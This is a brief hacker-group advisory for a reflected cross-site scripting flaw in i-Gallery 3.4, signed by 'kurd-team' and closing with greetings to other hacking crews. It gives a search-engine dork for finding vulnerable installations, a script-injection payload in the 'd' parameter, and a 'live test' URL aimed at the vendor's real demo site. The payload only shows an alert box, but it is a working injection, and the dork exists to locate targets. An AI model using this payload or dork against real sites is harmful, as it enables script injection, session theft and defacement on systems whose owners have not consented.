=========================================================== i-Gallery 3.4 asp Cross-site scripting Vulnerability ----------------------------------------------------------- foun by :kurd-team group : kurdish hackers team contact : pshela@yahoo.com site : kurdteam.org ----------------------------------------------------------- ------------------------script----------------------------- ----------------------------------------------------------- script : i-Gallery 3.4 site :http://www.b-cp.com/igallery34/ download : http://www.b-cp.com/igallery/download-count.asp ----------------------------------------------------------- dork : Powered By: i-Gallery 3.4 Exploit: -------- Exmple: ------- igallery.asp?d="><script>alert('kurd-team')</script> live teast : http://www.b-cp.com/igallery34/igallery.asp?d="><script>alert('kurd-team')</script> ----------------------------------------------------------- Zryan_kurd ,root-SyS , all Member cold hackers team(cmg-team.com) , all kurdish hackers ----------------------------------------------------------- ==================================================================